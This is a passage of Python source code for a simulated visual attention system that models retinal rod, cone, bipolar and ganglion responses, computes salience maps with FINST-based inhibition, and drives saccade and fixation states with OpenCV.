# 'BR' +Blue -Red
# 'BY' +Blue -Yellow
# 'YB' +Yellow -Blue
# 'WK' +White -Black (currently 'ON')
# 'KW' +Black -White (currently 'OFF')
# NOTE R = L cones, G = M cones, B = S cones
self.ganglionTypes = ['ON', 'OFF', 'RG', 'GR', 'RB', 'BR', 'BY', 'YB']
self.featurePlotColors = {'ON': 'gray', 'OFF': 'black', 'RG': 'red', 'GR': 'green', 'RB': 'tomato', 'BR': 'blue', 'BY': 'magenta', 'YB': 'gold'}
self.numGanglionTypes = np.int_(len(self.ganglionTypes)) # TODO use a single num-features parameter across the board?
self.numGanglionTypes_inv = 1.0 / self.imageTypeFloat(self.numGanglionTypes) # [optimization: frequently used quantity]
self.images['Ganglion'] = OrderedDict()
for ganglionType in self.ganglionTypes:
self.images['Ganglion'][ganglionType] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
# ** Combined response (salience) image (and related variables)
self.images['Salience'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.maxSalience = 0.0
self.maxSalienceLoc = (-1, -1)
# ** Spatial weight map with a central soft spotlight (use np.ogrid?)
self.images['Weight'] = getNormMap(self.imageSize[0], sigma=self.imageSize[0] / 2.0) # X-Y symmetric
# * Image processing elements
self.bipolarBlurSize = (11, 11) # size of blurring kernel used when computing Bipolar cell response
self.ganglionCenterSurroundKernel = self.imageTypeFloat(
[ [ -1, -1, -1, -1, -1, -1, -1 ],
[ -1, -1, -1, -1, -1, -1, -1 ],
[ -1, -1, 7, 7, 7, -1, -1 ],
[ -1, -1, 7, 9, 7, -1, -1 ],
[ -1, -1, 7, 7, 7, -1, -1 ],
[ -1, -1, -1, -1, -1, -1, -1 ],
[ -1, -1, -1, -1, -1, -1, -1 ] ])
self.ganglionCenterSurroundKernel /= np.sum(self.ganglionCenterSurroundKernel) # normalize
#self.logger.info("Ganglion center-surround kernel:\n{}".format(self.ganglionCenterSurroundKernel)) # [debug]
self.ganglionKernelLevels = 4
self.ganglionKernels = [None] * self.ganglionKernelLevels
self.ganglionKernels[0] = self.ganglionCenterSurroundKernel
for i in xrange(1, self.ganglionKernelLevels):
self.ganglionKernels[i] = cv2.resize(self.ganglionKernels[i - 1], dsize=None, fx=2, fy=2)
self.ganglionKernels[i] /= np.sum(self.ganglionKernels[i]) # normalize
#self.logger.info("Ganglion center-surround kernel sizes ({} levels): {}".format(self.ganglionKernelLevels, ", ".join("{}".format(k.shape) for k in self.ganglionKernels))) # [debug]
# * Neuron Populations and Projections connecting them
self.populations = OrderedDict() # dict with key = population label
self.projections = OrderedDict() # mapping from (pre_label, post_label) => projection object
# ** Retinal layers (TODO move this to a separate Retina class?)
self.createRetina()
# ** Layers in the Visual Cortex (TODO move this to a separate VisualCortex class?)
self.createVisualCortex() # creates and populates self.featurePathways
# * Eye movement
self.saccadeSalience = 0.0 # salience of last location we moved to
self.saccadeTarget = (0, 0) # center-relative
#self.lastSaccadeTime = self.timeNow # [unused]
self.fixationLoc = None # not None when fixated
# * FINSTs for maintaining attended locations
self.finsts = deque(maxlen=self.num_finsts)
# * Output image and plots
self.imageOut = None
if self.context.options.gui:
#self.imageOut = np.zeros(self.imageShapeC3, dtype=self.imageTypeInt)
cv2.namedWindow("Input", flags=default_window_flags)
cv2.namedWindow("Retina", flags=default_window_flags)
cv2.namedWindow("Output", flags=default_window_flags)
if self.context.options.debug:
for pathwayLabel in self.featurePathways.iterkeys():
cv2.namedWindow("{} Salience".format(pathwayLabel), flags=default_window_flags)
# TODO Salience and selection output will be for each feature pathway (but the same can be rendered to, displayed and reused)
self.imageSalienceOut = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt) # salience neuron outputs
self.imageSalienceOutCombined = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt) # salience neuron outputs, all pathways combined
#self.imageSelectionOut = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt) # selection neuron outputs
if showMonitor is None:
showMonitor = self.context.options.gui and self.context.options.debug
if showMonitor:
self.neuronPotentialMonitor = NeuronMonitor(show_legend=False)
for pathwayLabel, featurePathway in self.featurePathways.iteritems():
# Monitor single feature neuron
#self.neuronPotentialMonitor.addChannel(label=pathwayLabel, obj=featurePathway.output.neurons[0], color=self.featurePlotColors[pathwayLabel]) # very hard-coded way to access single output neuron!
# Monitor all feature neurons
for idx, outputNeuron in enumerate(featurePathway.output.neurons):
self.neuronPotentialMonitor.addChannel(label="{}_{}".format(pathwayLabel, idx), obj=outputNeuron, color=self.featurePlotColors[pathwayLabel])
self.neuronPotentialMonitor.start()
# * Buffers - mainly for communication with high-level (cognitive) architectures, other modules
# TODO Initialize all buffers with proper values
self.buffers = OrderedDict()
self.buffers['state'] = OutputBuffer(self.state)
self.buffers['intent'] = InputBuffer(self.handleIntent) # receive intent in a callable method
self.buffers['location'] = BidirectionalBuffer((0, 0)) # center-relative
self.buffers['size'] = BidirectionalBuffer((0, 0))
self.buffers['features'] = BidirectionalBuffer()
self.buffers['weights'] = InputBuffer()
self.buffers['salience'] = OutputBuffer(0.0)
self.buffers['match'] = OutputBuffer(0.0)
# * Once initialized, start in FREE state
self.transition(self.State.FREE)
def initialize(self, imageIn, timeNow):
pass # to emulate FrameProcessor-like interface
def process(self, imageIn, timeNow):
self.timeNow = timeNow
self.images['BGR'][:] = imageIn # NOTE: must be pre-allocated and of the same (compatible) shape as imageIn
if self.context.options.gui:
cv2.imshow("Retina", self.images['BGR'])
# * State-based pre-processing
if self.state == self.State.SACCADE:
# Check for saccade end
if self.timeNow > (self.lastTransitionTime + self.min_saccade_duration) and not self.ocularMotionSystem.isMoving:
self.transition(self.State.FIXATE) # TODO: transition to an intermediate state to check for successful saccade completion
else:
return True, self.imageOut # saccadic suppression - skip further processing if performing a saccade
# * TODO Read input buffers
weights = self.buffers['weights'].get_in(clear=True)
if weights is not None:
self.updateFeatureWeights(weights)
# * Get HSV
self.images['HSV'] = cv2.cvtColor(self.images['BGR'], cv2.COLOR_BGR2HSV)
self.images['H'], self.images['S'], self.images['V'] = cv2.split(self.images['HSV'])
# * Compute Rod and Cone responses
# TODO: Need non-linear response to hue, sat, val (less dependent on sat, val for cones)
# NOTE: Somehow, PhotoreceptorType.hue must be a numpy array, even if it is length 1, otherwise we hit a TypeError: <unknown> is not a numpy array!
self.images['Rod'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Rod.rod_type.hue) % 180) * 255 * self.images['V'] * Rod.rod_type.responseFactor # hack: use constant sat = 200 to make response independent of saturation
self.images['Cone']['S'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Cone.cone_types[0].hue) % 180) * self.images['S'] * self.images['V'] * Cone.cone_types[0].responseFactor
self.images['Cone']['M'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Cone.cone_types[1].hue) % 180) * self.images['S'] * self.images['V'] * Cone.cone_types[1].responseFactor
self.images['Cone']['L'] = self.imageTypeFloat(180 - cv2.absdiff(self.images['H'], Cone.cone_types[2].hue) % 180) * self.images['S'] * self.images['V'] * Cone.cone_types[2].responseFactor
# * Compute Bipolar and Ganglion cell responses
# ** Bipolar responses: Rods
# NOTE Blurring is a step that is effectively achieved in biology by horizontal cells
imageRodBlurred = cv2.blur(self.images['Rod'], self.bipolarBlurSize)
self.images['Bipolar']['ON'] = np.clip(self.images['Rod'] - 0.75 * imageRodBlurred, 0.0, 1.0)
self.images['Bipolar']['OFF'] = np.clip((1.0 - self.images['Rod']) - 0.9 * (1.0 - imageRodBlurred), 0.0, 1.0) # same as (1 - ON response)? (nope)
# ** Bipolar responses: Cones
# TODO Add multiscale Cone Bipolars to prevent unwanted response to diffuse illumination
imagesConeSBlurred = cv2.blur(self.images['Cone']['S'], self.bipolarBlurSize)
imagesConeMBlurred = cv2.blur(self.images['Cone']['M'], self.bipolarBlurSize)
imagesConeLBlurred = cv2.blur(self.images['Cone']['L'], self.bipolarBlurSize)
self.images['Bipolar']['S'] = np.clip(self.images['Cone']['S'] - 0.75 * imagesConeSBlurred, 0.0, 1.0)
self.images['Bipolar']['M'] = np.clip(self.images['Cone']['M'] - 0.75 * imagesConeMBlurred, 0.0, 1.0)
self.images['Bipolar']['L'] = np.clip(self.images['Cone']['L'] - 0.75 * imagesConeLBlurred, 0.0, 1.0)
# ** Ganglion cells simply add up responses from a (bunch of) central bipolar cell(s) (ON/OFF) and surrounding antagonistic bipolar cells (OFF/ON)
# *** Method 1: Center - Surround
#imageGanglionCenterON = cv2.filter2D(self.images['Bipolar']['ON'], -1, self.ganglionCenterKernel)
#imageGanglionSurroundOFF = cv2.filter2D(self.images['Bipolar']['OFF'], -1, self.ganglionSurroundKernel)
#self.images['Ganglion']['ON'] = 0.75 * imageGanglionCenterON + 0.25 * imageGanglionSurroundOFF
# *** Method 2: Center-Surround kernel
#self.images['Ganglion']['ON'] = np.clip(cv2.filter2D(self.images['Bipolar']['ON'], -1, self.ganglionCenterSurroundKernel), 0.0, 1.0)
#self.images['Ganglion']['OFF'] = np.clip(cv2.filter2D(self.images['Bipolar']['OFF'], -1, self.ganglionCenterSurroundKernel), 0.0, 1.0)
# *** Method 3: Multi-level Center-Surround kernels, taking maximum
for ganglionImage in self.images['Ganglion'].itervalues():
ganglionImage.fill(0.0) # reset all to zero
for k in self.ganglionKernels:
# Rod pathway
self.images['Ganglion']['ON'] = np.maximum(self.images['Ganglion']['ON'], np.clip(cv2.filter2D(self.images['Bipolar']['ON'], -1, k), 0.0, 1.0))
self.images['Ganglion']['OFF'] = np.maximum(self.images['Ganglion']['OFF'], np.clip(cv2.filter2D(self.images['Bipolar']['OFF'], -1, k), 0.0, 1.0))
# Cone pathway
imageRG = self.images['Bipolar']['L'] - self.images['Bipolar']['M']
imageRB = self.images['Bipolar']['L'] - self.images['Bipolar']['S']
imageBY = self.images['Bipolar']['S'] - (self.images['Bipolar']['L'] + self.images['Bipolar']['M']) / 2
self.images['Ganglion']['RG'] = np.maximum(self.images['Ganglion']['RG'], np.clip(cv2.filter2D(imageRG, -1, k), 0.0, 1.0))
self.images['Ganglion']['GR'] = np.maximum(self.images['Ganglion']['GR'], np.clip(cv2.filter2D(-imageRG, -1, k) * 1.6, 0.0, 1.0)) # TODO: formalize this fixed relative weighting scheme to counter unequal color representation
self.images['Ganglion']['RB'] = np.maximum(self.images['Ganglion']['RB'], np.clip(cv2.filter2D(imageRB, -1, k), 0.0, 1.0))
self.images['Ganglion']['BR'] = np.maximum(self.images['Ganglion']['BR'], np.clip(cv2.filter2D(-imageRB, -1, k), 0.0, 1.0))
self.images['Ganglion']['BY'] = np.maximum(self.images['Ganglion']['BY'], np.clip(cv2.filter2D(imageBY, -1, k), 0.0, 1.0))
self.images['Ganglion']['YB'] = np.maximum(self.images['Ganglion']['YB'], np.clip(cv2.filter2D(-imageBY, -1, k) * 1.6, 0.0, 1.0)) # TODO: also here
# * Compute combined (salience) image; TODO incorporate attention weighting (spatial, as well as by visual feature)
# ** Method 1: Max of all Ganglion cell images
self.images['Salience'].fill(0.0)
for ganglionType, ganglionImage in self.images['Ganglion'].iteritems():
#self.images['Salience'] = np.maximum(self.images['Salience'], ganglionImage)
#self.logger.debug("[Salience] Combining {}".format(self.featurePathways[ganglionType])) # [verbose]
self.images['Salience'] = np.maximum(self.images['Salience'], np.sqrt(self.featurePathways[ganglionType].p) * ganglionImage) # take maximum, scaled by feature pathway probabilities (for display only)
#self.images['Salience'] = self.images['Salience'] + (self.numGanglionTypes_inv * np.sqrt(self.featurePathways[ganglionType].p) * ganglionImage) # take normalized sum (mixes up features), scaled by feature pathway probabilities (for display only)
# * Update FINSTs if decay is enabled (otherwise activation doesn't change, FINSTs are purged when there's no more room)
if self.finst_decay_enabled:
for finst in self.finsts:
finst.update(self.timeNow)
# Remove stale FINSTs (TODO: use priority queue, don't depend on FINSTs being sorted by activation)
while self.finsts and self.finsts[0].activation < Finst.min_good_activation:
self.finsts.popleft()
# * Apply inhibition based on FINSTs
if self.finst_inhibition_enabled and self.finsts:
self.logger.debug("Current FINSTs: {}".format(", ".join(str(finst) for finst in self.finsts)))
for finst in self.finsts:
self.inhibitMapAtFinst(self.images['Salience'], finst)
self.images['Salience'] = cv2.blur(self.images['Salience'], (3, 3)) # blur slightly to smooth out specs
self.images['Salience'] *= self.images['Weight'] # effectively reduces salience around the edges (which can sometime give artificially high values due to partial receptive fields)
_, self.maxSalience, _, self.maxSalienceLoc = cv2.minMaxLoc(self.images['Salience']) # find out most salient location (from combined salience map)
self.logger.debug("Max. salience value: {:5.3f} @ {}".format(self.maxSalience, self.maxSalienceLoc)) # [verbose]
# * Compute features along each pathway
if self.context.options.gui and self.context.options.debug:
self.imageSalienceOutCombined.fill(0.0)
for pathwayLabel, featurePathway in self.featurePathways.iteritems():
if featurePathway.active:
# ** Update feature pathway populations (TODO find a more reliable way of grabbing salience and selection neuron populations)
#featurePathway.update(self.timeNow) # currently doesn't do anything, update populations explicitly
salienceNeurons = featurePathway.populations[0]
selectionNeurons = featurePathway.populations[1]
featureNeurons = featurePathway.populations[2]
# *** Salience neurons
for salienceNeuron in salienceNeurons.neurons:
#salienceNeuron.update(timeNow) # update every iteration
#salienceNeuron.updateWithP(timeNow) # update using intrinsic probability (adaptive)
if np.random.uniform() < featurePathway.p: # update using pathway probability (TODO try to make this adaptive?)
salienceNeuron.update(timeNow)
#self.logger.debug("{} Salience neuron potential: {:.3f}, response: {:.3f}, I_e: {}, pixelValue: {}".format(pathwayLabel, salienceNeuron.potential, salienceNeuron.response, salienceNeuron.I_e, salienceNeuron.pixelValue))
# *** Selection neurons (TODO mostly duplicated code, perhaps generalizable?)
for selectionNeuron in selectionNeurons.neurons:
#selectionNeuron.update(timeNow) # update every iteration
#selectionNeuron.updateWithP(timeNow) # update using intrinsic probability (adaptive)
if np.random.uniform() < featurePathway.p: # update using pathway probability (TODO try to make this adaptive?)
selectionNeuron.update(timeNow)
else:
selectionNeuron.potentialAccumulated = 0.0 # clear any accumulated potential, effectively inhibiting the selection neuron
#self.logger.debug("{} Selection neuron potential: {:.3f}, pixelValue: {}".format(pathwayLabel, selectionNeuron.potential, selectionNeuron.pixelValue))
# **** Pick one selection neuron, inhibit others
# TODO Use a top-level feature neuron with graded potential to return activation level
#numUninhibited = 0 # [debug]
for selectionNeuron in selectionNeurons.neurons:
# Render selection neuron's position with response-based pixel value (TODO build receptive field when synapses are made, or later, using a stimulus test phase?)
#if selectionNeuron.pixelValue > 200: print "[{:.2f}] {}".format(timeNow, selectionNeuron) # [debug]
if not selectionNeuron.isInhibited and selectionNeuron.timeLastFired == timeNow: # only deal with uninhibited neurons that just fired in this iteration
#numUninhibitedFired += 1 # [debug]
#cv2.circle(self.imageSelectionOut, (selectionNeuron.pixel[0], selectionNeuron.pixel[1]), self.imageSize[0] / 20, selectionNeuron.pixelValue, cv.CV_FILLED) # only render the one selected neuron, later
featurePathway.selectedNeuron = selectionNeuron
featurePathway.selectedTime = timeNow
featurePathway.selectedNeuron.inhibit(timeNow, neuron_inhibition_period + 0.75) # inhibit selected neuron for a bit longer
break # first uninhibited SelectionNeuron will be our selected neuron
#print "# Uninhibited selection neurons that fired: {}".format(numUninhibitedFired) # [debug]
# *** Feature neuron
for featureNeuron in featureNeurons.neurons:
featureNeuron.update(timeNow) # update every iteration
#featureNeuron.updateWithP(timeNow) # update probabilistically
#self.logger.debug("{} Feature neuron potential: {:.3f}, pixelValue: {}".format(pathwayLabel, featureNeuron.potential, featureNeuron.pixelValue))
# ** Render output images and show them (per feature pathway, better show in debug mode only)
if self.context.options.gui and self.context.options.debug:
# *** Salience neurons
self.imageSalienceOut.fill(0.0)
for salienceNeuron in salienceNeurons.neurons:
# Render salience neuron's receptive field with response-based pixel value (TODO cache int radii and pixel as tuple?)
#cv2.circle(self.imageSalienceOut, (salienceNeuron.pixel[0], salienceNeuron.pixel[1]), np.int_(salienceNeuron.rfRadius), 128) # outer radius of surround as a boundary
cv2.circle(self.imageSalienceOut, (salienceNeuron.pixel[0], salienceNeuron.pixel[1]), np.int_(salienceNeuron.rfCenterRadius), salienceNeuron.pixelValue, cv.CV_FILLED) # inner center field, filled with current value
self.imageSalienceOutCombined = np.maximum(self.imageSalienceOutCombined, self.imageSalienceOut)
# *** Selection neurons
if featurePathway.selectedNeuron is not None and (timeNow - featurePathway.selectedTime) < 3.0:
#self.imageSelectionOut.fill(0.0)
cv2.circle(self.imageSalienceOut, (featurePathway.selectedNeuron.pixel[0], featurePathway.selectedNeuron.pixel[1]), featurePathway.selectedNeuron.rfRadius, int(255 * exp(featurePathway.selectedTime - timeNow)), 2) # draw selected neuron with a shade that fades with time (on salience output image)
#cv2.circle(self.imageSelectionOut, (featurePathway.selectedNeuron.pixel[0], featurePathway.selectedNeuron.pixel[1]), featurePathway.selectedNeuron.rfRadius, int(255 * exp(featurePathway.selectedTime - timeNow)), cv.CV_FILLED) # draw selected neuron with a shade that fades with time
cv2.imshow("{} Salience".format(pathwayLabel), self.imageSalienceOut)
#cv2.imshow("{} Selection".format(pathwayLabel), self.imageSelectionOut)
# * TODO Compute feature vector of attended region
# * Post-processing: Write to output buffers, state-based actions, check for transitions
self.buffers['salience'].set_out(self.maxSalience)
self.buffers['location'].set_out(self.toCenterRelative(self.maxSalienceLoc))
self.updateFeatureVector() # external buffer reads may need this
if self.state == self.State.FREE:
if self.maxSalience >= self.min_good_salience or \
(self.maxSalience >= self.min_saccade_salience and self.timeNow > (self.lastTransitionTime + self.max_free_duration)): # we have good (or good enough) salience, lets saccade to it
self.saccadeSalience = self.maxSalience
self.saccadeTarget = np.int_(self.buffers['location'].get_out()) # ocular motion system requires a 2-element numpy array
self.performSaccade(self.saccadeTarget)
elif self.timeNow > (self.lastTransitionTime + self.max_free_duration): # we've been waiting too long, nothing significant, let's reset
self.performSaccade(None) # TODO: Probabilistically choose a not-so-good location?
elif self.state == self.State.FIXATE:
# Update fixation location (first time this fixation only)
# TODO: Maybe a good idea to use a new FIXATED state after FIXATE?
if self.fixationLoc is None:
self.fixationLoc = self.maxSalienceLoc
self.fixationSlice = np.index_exp[int(self.fixationLoc[1] - self.foveaSize[1] / 2):int(self.fixationLoc[1] + self.foveaSize[1] / 2), int(self.fixationLoc[0] - self.foveaSize[0] / 2):int(self.fixationLoc[0] + self.foveaSize[0] / 2)]
# NOTE: This slice could be smaller than self.foveaSize
self.logger.info("Fixated at: {}, fixation slice: {}".format(self.fixationLoc, self.fixationSlice))
# Update feature vector representing current state of neurons
self.logger.debug("[{:.2f}] Features: {}".format(self.timeNow, self.featureVector)) # [verbose]
#self.logger.debug("[{:.2f}] Feature matrix:\n {}".format(self.timeNow, "\n ".join("{}: {}".format(label, self.featureMatrix[i]) for i, label in enumerate(self.featureLabels)))) # [very verbose!]
self.buffers['features'].set_out(dict(izip(self.featureLabels, self.featureVector))) # TODO: find a better way than zipping every iteration (named tuple or something?)
if self.timeNow > (self.lastTransitionTime + self.min_fixation_duration):
# TODO: Update match buffer based on feature values and weights
# TODO: Compute utility based on duration of fixation (falling activation), match and/or salience
# TODO: If very high utility, turn on hold (assuming agent will ask us to release)
# If low utility or past max_fixation_duration, switch to FREE state and look somewhere else
maxSalienceLocDist = hypot(self.maxSalienceLoc[0] - self.fixationLoc[0], self.maxSalienceLoc[1] - self.fixationLoc[1])
# Put a limit on hold
if self.hold and self.timeNow > (self.lastTransitionTime + self.max_hold_duration):
self.hold = False # NOTE: This forcefully breaks a hold; might be better to depend on salient stimuli
# Check for possible transitions out of FIXATE
if not self.hold and \
(maxSalienceLocDist > self.fovealRadius or \
self.maxSalience < self.saccadeSalience or \
self.timeNow > (self.lastTransitionTime + self.max_fixation_duration)):
# Create FINST to inhibit current location in future, before switching to FREE
if self.maxSalience >= self.min_saccade_salience: # if current location is still salient enough to elicit a saccade
self.finsts.append(Finst(self.fixationLoc, self.ocularMotionSystem.getFocusPoint(), timeCreated=self.timeNow)) # TODO: pass in activationCreated once FINSTs are stored in priority queue
self.fixationLoc = None # set to None to indicate we're no longer fixated; next fixation will store a new location
self.transition(self.State.FREE)
# * Show output images if in GUI mode
if self.context.options.gui:
#cv2.imshow("Hue", self.images['H'])
#cv2.imshow("Saturation", self.images['S'])
#cv2.imshow("Value", self.images['V'])
if self.context.options.debug: # only show detail when in debug mode; limit to important images/maps
#cv2.imshow("Rod response", self.images['Rod'])
#for coneType, coneImage in self.images['Cone'].iteritems():
# cv2.imshow("{} Cones".format(coneType), coneImage)
for bipolarType, bipolarImage in self.images['Bipolar'].iteritems():
cv2.imshow("{} Bipolar cells".format(bipolarType), bipolarImage)
for ganglionType, ganglionImage in self.images['Ganglion'].iteritems():
cv2.imshow("{} Ganglion cells".format(ganglionType), ganglionImage)
#cv2.imshow("{} Ganglion cells".format(ganglionType), np.sqrt(self.featurePathways[ganglionType].p) * ganglionImage) # show image weighted by selected feature probability, artificially scaled to make responses visible
#cv2.imshow("Salience", self.images['Salience']) # combined salience image
# Designate a representative output image
#self.imageOut = cv2.bitwise_and(self.retina.images['BGR'], self.retina.images['BGR'], mask=self.imageSelectionOut) # mask out everything outside selected neuron's receptive field
self.imageOut = self.images['Salience'] # make a copy?
#_, self.imageOut = cv2.threshold(self.imageOut, 0.1, 1.0, cv2.THRESH_TOZERO) # apply threshold to remove low-response regions
self.imageOut = np.uint8(self.imageOut * 255) # convert to uint8 image for display (is this necessary?)
if self.maxSalience >= self.min_saccade_salience:
cv2.circle(self.imageOut, self.maxSalienceLoc, 3, 175, -1) # mark most salient location with a small faint dot
if self.maxSalience >= self.min_good_salience:
cv2.circle(self.imageOut, self.maxSalienceLoc, int(self.maxSalience * 25), int(128 + self.maxSalience * 127), 1 + int(self.maxSalience * 4)) # highlight highly salient locations: larger, fatter, brighter for higher salience value
if self.state == self.State.FIXATE and self.fixationLoc is not None:
cv2.circle(self.imageOut, self.fixationLoc, 1, 225, -1) # mark fixation location with a tiny bright dot
cv2.putText(self.imageOut, self.State.toString(self.state) + (" (holding)" if self.hold else ""), (20, 40), cv2.FONT_HERSHEY_PLAIN, 1.5, 200, 2) # show current state
return True, self.imageOut
def stop(self):
# TODO Ensure this gets called for proper clean-up, esp. now that we are using an animated plot
if self.context.options.gui:
self.neuronPotentialMonitor.stop()
def transition(self, next_state):
self.logger.info("[{:.2f}] Transitioning from {} to {} state after {:.2f}s".format(self.timeNow, self.State.toString(self.state), self.State.toString(next_state), (self.timeNow - self.lastTransitionTime)))
self.state = next_state
self.lastTransitionTime = self.timeNow
self.buffers['state'].set_out(self.state) # update corresponding buffer
def handleIntent(self, intent):
if intent is None or intent not in self.intents:
self.logger.warning("Unknown/null intent: '%s'", intent)
return
self.logger.info("Intent: %s", intent)
if intent == 'find':
# NOTE All relevant buffers must be set *before* find intent is sent in
self.transition(self.State.FREE) # reset state to use new weights
self.hold = False # implies we can move around again
elif intent == 'hold':
self.hold = True # system won't perform saccades, even if utility drops
if self.state == self.State.FREE:
self.transition(self.State.FIXATE) # transition to FIXATE state (unless performing a saccade)
elif intent == 'release':
self.hold = False # system can resume FIXATE-SACCADE cycle
elif intent == 'reset':
self.finsts.clear()
self.transition(self.State.SACCADE)
self.ocularMotionSystem.reset() # reset to the center of visual stream
self.hold = False
else:
self.logger.warning("Unhandled intent: '%s'", intent)
def performSaccade(self, saccadeTarget=None):
if self.ocularMotionSystem is not None:
self.transition(self.State.SACCADE)
if saccadeTarget is not None:
self.ocularMotionSystem.move(saccadeTarget)
else:
self.ocularMotionSystem.reset()
else:
self.logger.warning("Ocular motion system not found, skipping to FIXATE")
self.transition(self.State.FIXATE)
def inhibitMapAtFinst(self, imageMap, finst):
loc = finst.getAdjustedLocation(self.ocularMotionSystem.getFocusPoint())
#cv2.circle(imageMap, loc, finst.radius, 0.0, cv.CV_FILLED) # hard inhibition with solid 0 circle
# Soft inhibition using finst.inhibitionMap (TODO: affected by finst.activation?)
inhibitionTarget = imageMap[max(loc[1] - finst.radius, 0):min(loc[1] + finst.radius, imageMap.shape[0]), max(loc[0] - finst.radius, 0):min(loc[0] + finst.radius, imageMap.shape[1])]
sourceTopLeft = (max(finst.radius - loc[1], 0), max(finst.radius - loc[0], 0)) # (y, x)
inhibitionSource = finst.inhibitionMap[sourceTopLeft[0]:(sourceTopLeft[0] + inhibitionTarget.shape[0]), sourceTopLeft[1]:(sourceTopLeft[1] + inhibitionTarget.shape[1])]
#self.logger.debug("loc: {}, source.shape: {}, target.shape: {}, sourceTopLeft: {}".format(loc, inhibitionSource.shape, inhibitionTarget.shape, sourceTopLeft))
inhibitionTarget *= (1.0 - finst.activation * inhibitionSource)
#cv2.putText(imageMap, "{:.2f}".format(finst.timeCreated), (loc[0] + finst.radius, loc[1] - finst.radius), cv2.FONT_HERSHEY_PLAIN, 1, 0.0) # [debug]
def updateFeatureWeights(self, featureWeights, rest=None):
"""Update weights for features mentioned in given dict, using rest for others if not None."""
# TODO Handle special labels for spatial selection
if rest is None:
rest = featureWeights.get('rest', None) # rest may also be passed in as a dict item
for label, pathway in self.featurePathways.iteritems():
if label in featureWeights:
pathway.p = featureWeights[label]
elif rest is not None:
pathway.p = rest
def updateFeatureVector(self):
# TODO: Also compute mean and variance over a moving window here? (or should that be an agent/manager-level function?)
# Feature vector picks a single value from each channel
self.featureVector = np.float32([pathway.output.neurons[0].potential for pathway in self.featurePathways.itervalues()])
# Feature matrix picks all neuron values from each channel
self.featureMatrix = np.float32([[neuron.potential for neuron in pathway.output.neurons] for pathway in self.featurePathways.itervalues()])
def toCenterRelative(self, coords):
return (coords[0] - self.imageCenter[0], coords[1] - self.imageCenter[1]) # convert to center-relative coordinates
def createPopulation(self, *args, **kwargs):
"""Create a basic Population with given arguments."""
return self.addPopulation(Population(*args, **kwargs))
def addPopulation(self, population):
"""Add a given Population to this VisualSystem."""
#assert isinstance(population, Population) # allow other Population-like objects?
assert population.label not in self.populations # refuse to overwrite existing population with same label
self.populations.append(population)
return population
def createProjection(self, presynaptic_population, postsynaptic_population, **kwargs):
"""Create a basic Projection from presynaptic to postsynaptic population, with given keyword arguments."""
assert presynaptic_population in self.populations and postsynaptic_population in self.populations
return self.addProjection(Projection(presynaptic_population, postsynaptic_population, **kwargs))
def addProjection(self, projection):
self.projections.append(projection)
return projection
def createRetina(self):
# TODO * Create Photoreceptor layer
# TODO * Create BipolarCell layer
# TODO * Create GanglionCell layer
pass
def createVisualCortex(self):
# * Create several feature pathways, each with a salience, selection and feature layer
self.featureLabels = self.images['Ganglion'].keys() # cached for frequent use (NOTE currently will need to be updated if self.images['Ganglion'] changes)
self.featurePathways = OrderedDict()
for pathwayLabel in self.featureLabels: # Ganglion cells are the source of each low-level visual pathway
self.logger.info("Creating '{}' feature pathway".format(pathwayLabel))
# ** Create layers
# *** Salience neurons (TODO introduce magno and parvo types; expose layer parameters such as Z-axis position)
salienceLayerBounds = np.float32([[0.0, 0.0, 0.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 0.0]])
salienceNeuronDistribution = MultivariateNormal(mu=self.center, cov=(np.float32([self.center[0] ** 1.5, self.center[1] ** 1.5, 1.0]) * np.identity(3, dtype=np.float32)))
#salienceNeuronDistribution = MultivariateUniform(lows=[0.0, 0.0, 0.0], highs=[self.imageSize[0], self.imageSize[1], 0.0])
salienceNeurons = Population(numNeurons=self.num_salience_neurons, timeNow=self.timeNow, neuronTypes=[SalienceNeuron], bounds=salienceLayerBounds, distribution=salienceNeuronDistribution, system=self, pathway=pathwayLabel, imageSet=self.images['Ganglion'])
# TODO self.addPopulation(salienceNeurons)?
# *** Selection neurons
selectionLayerBounds = np.float32([[0.0, 0.0, 50.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 50.0]])
selectionNeuronDistribution = MultivariateNormal(mu=self.center + np.float32([0.0, 0.0, 50.0]), cov=(np.float32([self.center[0] ** 1.5, self.center[1] ** 1.5, 1.0]) * np.identity(3, dtype=np.float32)))
#selectionNeuronDistribution = MultivariateUniform(lows=[0.0, 0.0, 50.0], highs=[self.imageSize[0], self.imageSize[1], 50.0])
selectionNeurons = Population(numNeurons=self.num_selection_neurons, timeNow=self.timeNow, neuronTypes=[SelectionNeuron], bounds=selectionLayerBounds, distribution=selectionNeuronDistribution, system=self, pathway=pathwayLabel)
# TODO self.addPopulation(selectionNeurons)?
# *** Feature neurons (usually a single neuron for most non spatially-sensitive features)
featureLayerBounds = np.float32([[0.0, 0.0, 100.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 100.0]])
featureNeuronDistribution = MultivariateNormal(mu=self.center + np.float32([0.0, 0.0, 100.0]), cov=(np.float32([self.center[0] / 10, self.center[1] / 10, 1.0]) * np.identity(3, dtype=np.float32))) # positioning doesn't matter much
featureNeurons = Population(numNeurons=self.num_feature_neurons, timeNow=self.timeNow, neuronTypes=[FeatureNeuron], bounds=featureLayerBounds, distribution=featureNeuronDistribution, system=self, pathway=pathwayLabel)
# TODO Set feature neuron plotColor to something more representative of the pathway
# ** Connect neuron layers
# *** Salience neurons to selection neurons (TODO use createProjection() once Projection is implemented, and register using self.addProjection)
salienceNeurons.connectWith(selectionNeurons, maxConnectionsPerNeuron=5)
# For selection neurons, finalize their receptive field radii based on connected neurons (average distance to extrema)
minRFRadius = None
maxRFRadius = None
for selectionNeuron in selectionNeurons.neurons:
xlim = [selectionNeuron.location[0], selectionNeuron.location[0]] # min, max
ylim = [selectionNeuron.location[1], selectionNeuron.location[1]] # min, max
for inputNeuron in selectionNeuron.inputNeurons:
xlim[0] = min(xlim[0], inputNeuron.location[0] - inputNeuron.rfRadius)
xlim[1] = max(xlim[1], inputNeuron.location[0] + inputNeuron.rfRadius)
ylim[0] = min(ylim[0], inputNeuron.location[1] - inputNeuron.rfRadius)
